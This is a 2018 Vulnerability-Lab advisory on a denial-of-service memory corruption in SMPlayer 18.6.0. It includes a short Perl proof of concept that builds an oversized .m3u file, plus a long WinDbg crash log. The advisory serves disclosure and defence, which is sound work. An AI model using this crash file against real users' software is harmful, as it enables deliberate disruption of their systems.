i>>?Document Title:
===============
SMPlayer 18.6.0 - Memory Corruption (DoS) Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2138
Release Date:
=============
2018-07-23
Vulnerability Laboratory ID (VL-ID):
====================================
2138
Common Vulnerability Scoring System:
====================================
4.4
Vulnerability Class:
====================
Denial of Service
Current Estimated Price:
========================
500a! - 1.000a!
Product & Service Introduction:
===============================
SMPlayer is a free multimedia player for Windows and Linux with built-in codecs that can play virtually any video and audio format.
It does not need any additional codecs. Install SMPlayer with ease and you'll be able to instantly play all audio and video formats
without having to search for and install additional codecs.
(Copy of the Vendor Homepage: http://www.smplayer.info/)
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a memory corruption vulnerability in the official SMPlayer v18.6.0 software.
Vulnerability Disclosure Timeline:
==================================
2018-07-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A memory corruption vulnerability resulting in a denial of service has been discovered in the official SMPlayer v18.6.0 software.
The vulnerability is caused by an invalid pointer corruption while processing a corrupted .m3u file through the SMPlayer reader.
Which could be exploited by attackers to crash a complete software process via denial of service. The vulnerability is located in
the Qt5Core.dll when processing an .m3u file on import.
Vulnerable Modules:
[+] Open
[+] File
[+] Reading
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by local attackers via import or by remote attackers via user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC: Exploitation (Perl)
#!/usr/bin/perl
my $Buff = "A" x 122200;
open(MYFILE,'>>Corruption.m3u');
print MYFILE $Buff;
close(MYFILE);
print " POC Created by ZwX";
--- PoC Debug Session Logs (Windbg) ---
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 68b724d9 (Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+0x000005f9)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 020ffffe
Attempt to write to address 020ffffe
FAULTING_THREAD: 00000994
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE
PROCESS_NAME: smplayer.exe
FOLLOWUP_IP:
Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+5f9
68b724d9 66895702 mov word ptr [edi+2],dx
WRITE_ADDRESS: 020ffffe
ERROR_CODE: (NTSTATUS) 0xc0000005 - <Unable to get error code text>
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - <Unable to get error code text>
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 020ffffe
WATSON_BKT_PROCSTAMP: 5b2f993b
WATSON_BKT_PROCVER: 18.6.0.0
PROCESS_VER_PRODUCT: SMPlayer for Windows (32-bit)
WATSON_BKT_MODULE: Qt5Core.dll
WATSON_BKT_MODSTAMP: 5715839e
WATSON_BKT_MODOFFSET: f24d9
WATSON_BKT_MODVER: 5.6.0.0
MODULE_VER_PRODUCT: Qt5
BUILD_VERSION_STRING: 7601.24168.x86fre.win7sp1_ldr.180608-0600
MODLIST_WITH_TSCHKSUM_HASH: ec621d6b16ea647fcad270b607987d6790c6372e
MODLIST_SHA1_HASH: 22b51cf1164db3537920237889937f627826c434
NTGLOBALFLAG: 70
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 784
DUMP_TYPE: fe
ANALYSIS_SESSION_TIME: 07-20-2018 16:01:44.0461
ANALYSIS_VERSION: 10.0.17134.12 x86fre
THREAD_ATTRIBUTES:
OS_LOCALE: FRA
PROBLEM_CLASSES:
ID: [0n309]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x994]
Frame: [0] : Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile
ID: [0n282]
Type: [INVALID_POINTER_WRITE]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x994]
Frame: [0] : Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
LAST_CONTROL_TRANSFER: from 68b552b9 to 68b724d9
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0022c968 68b552b9 00000023 0022ca38 0022ca08 Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+0x5f9
0022c9c8 68b72b3c 00000003 00000000 037ef398 Qt5Core!ZN5QFile4openE6QFlagsIN9QIODevice12OpenModeFlagEE+0x59
0022ca58 68b94738 0022cab8 0022cae0 00000000 Qt5Core!ZN14QTemporaryFile4openE6QFlagsIN9QIODevice12OpenModeFlagEE+0x2c
0022cae8 68b94d99 00000000 00000000 00666c30 Qt5Core!ZN9QSettings5eventEP6QEvent+0x378
0022cb18 00445290 0022cb7c 00000000 00000000 Qt5Core!ZN9QSettings5eventEP6QEvent+0x9d9
0022cba8 004502ad 0022cbdc 00000002 027b14d8 smplayer+0x45290
0022cc08 0046961a 027b4388 0022cd38 00000007 smplayer+0x502ad
0022cc88 0046ad1c 0022cd38 0022cd3c 00000004 smplayer+0x6961a
0022cd68 0046bfea 0022cdb8 00000000 0022cda8 smplayer+0x6ad1c
0022cdd8 68c15612 027b1430 00000000 00000022 smplayer+0x6bfea
0022ce78 004c08cc 027b8a48 00000007 00000000 Qt5Core!ZN11QMetaObject8activateEP7QObjectiiPPv+0x212
0022cf18 004c98e1 00000000 00000000 00000000 smplayer+0xc08cc
0022d058 004f97f0 0022d0ac 00000002 00686bc4 smplayer+0xc98e1
0022d0d8 00501901 0022d1a4 021d56f0 0022d128 smplayer+0xf97f0
0022d1d8 00523690 00000000 00000000 000002aa smplayer+0x101901
0022d228 68c15612 021d56f0 00000000 0000000b smplayer+0x123690
0022d2c8 00cb4238 02874d38 00000003 00000001 Qt5Core!ZN11QMetaObject8activateEP7QObjectiiPPv+0x212
0022d2f8 00e2bfb0 00000000 68d2c200 00000000 Qt5Widgets!ZN7QAction8activateENS_11ActionEventE+0x98
0022d398 00e2a9de 0022d3d0 00000000 00000420 Qt5Widgets!ZN5QMenu18setToolTipsVisibleEb+0x2a0
0022d3a8 77156370 00000000 00000000 000000dc Qt5Widgets!ZN5QMenu7hoveredEP7QAction+0xd1e
0022d498 00e360ba 0022d820 021574e8 0000000c ntdll!RtlpFreeHeap+0xb7a
0022d4a8 6aa8f5f1 021181e0 0000000c 0022d518 Qt5Widgets!ZN5QMenu5eventEP6QEvent+0x11a
0022d4b8 68a9e6af 0000001b 0371e2f8 00000010 qwindows+0xf5f1
0022d518 61b76f8b 0022d820 00000000 00000048 Qt5Core!ZN7QThread21setTerminationEnabledEb+0x4af
0022d538 00cbfcc1 028b7ae0 0022d820 0022d848 Qt5Gui!ZNK11QMouseEvent5flagsEv+0xb
0022d5a4 771c5c6e 02148bc0 00000001 00000000 Qt5Widgets!ZN12QApplication6notifyEP7QObjectP6QEvent+0xb51
0022d5d4 771c6c18 00360138 00000029 0000000f ntdll!RtlpValidateHeap+0x20
0022d678 61b69e7a 0212a8a8 00000000 00000000 ntdll!RtlDebugFreeHeap+0x276
0022d6a8 68bf5259 028b7ae0 0022d820 0022d77c Qt5Gui!ZNK7QWindow8geometryEv+0x1ba
0022d6f8 00cbe96c 028b7ae0 0022d820 02957d40 Qt5Core!ZN16QCoreApplication15notifyInternal2EP7QObjectP6QEvent+0x109
0022d898 00d1537a 0022dbb0 0022dbb0 00000000 Qt5Widgets!ZN19QApplicationPrivate14sendMouseEventEP7QWidgetP11QMouseEventS1_S1_PS1_R8QPointerIS0_Eb+0x1dc
0022d8c8 68bf4cef 00000000 03766523 00000000 Qt5Widgets!ZN14QDesktopWidget11qt_metacallEN11QMetaObject4CallEiPPv+0x48ba
0022fe38 005d7d52 00000001 02142fb8 009751a0 Qt5Core!ZN23QCoreApplicationPrivate29threadRequiresCoreApplicationEv+0xf
0022fe98 00635f1d 00400000 00000000 00962598 smplayer+0x1d7d52
0022feb8 004013e2 00363aa8 00000019 00000001 smplayer+0x235f1d
0022ff88 7560efac 7ffd3000 0022ffd4 77163628 smplayer+0x13e2
0022ff94 77163628 7ffd3000 77dd4275 00000000 kernel32!BaseThreadInitThunk+0x12
0022ffd4 771635fb 004014c0 7ffd3000 00000000 ntdll!__RtlUserThreadStart+0x70
0022ffec 00000000 004014c0 7ffd3000 00000000 ntdll!_RtlUserThreadStart+0x1b
STACK_COMMAND: ~0s ; .cxr ; kb
THREAD_SHA1_HASH_MOD_FUNC: ad89141657ca48c6d034b3799d071b71260125cc
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 83a292b67a1ed4f6616c9779d9411dcb769f07bc
THREAD_SHA1_HASH_MOD: 87d5f5752469a4414a8f7facb8849b26ec792c75
FAULT_INSTR_CODE: 2578966
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+5f9
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Qt5Core
IMAGE_NAME: Qt5Core.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5715839e
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_Qt5Core.dll!ZN14QTemporaryFile16createNativeFileER5QFile
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+5f9
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: Qt5Core.dll
BUCKET_ID_IMAGE_STR: Qt5Core.dll
FAILURE_MODULE_NAME: Qt5Core
BUCKET_ID_MODULE_STR: Qt5Core
--------------------------------------
0:000> lmvm Qt5Core
Browse full module list
start end module name
68a80000 68faf000 Qt5Core (export symbols) C:SMPlayerQt5Core.dll
Loaded symbol image file: C:SMPlayerQt5Core.dll
Image path: C:SMPlayerQt5Core.dll
Image name: Qt5Core.dll
Browse all global symbols functions data
Timestamp: Mon Apr 18 18:02:22 2016 (5715839E)
CheckSum: 0052E947
ImageSize: 0052F000
File version: 5.6.0.0
Product version: 5.6.0.0
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 2.0 Dll
File date: 00000000.00000000
Translations: 0409.04b0
Information from resource tables:
CompanyName: The Qt Company Ltd
ProductName: Qt5
OriginalFilename: Qt5Core.dll
ProductVersion: 5.6.0.0
FileVersion: 5.6.0.0
FileDescription: C++ application development framework.
LegalCopyright: Copyright (C) 2015 The Qt Company Ltd.
Security Risk:
==============
The security risk of the memory corruption that occurs by an invalid pointer write on import is estimated as medium.
Credits & Authors:
==================
ZwX - https://www.vulnerability-lab.com/show.php?user=ZwX
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright A(c) 2018 | Vulnerability Laboratory - [Evolution Security GmbH]aC/
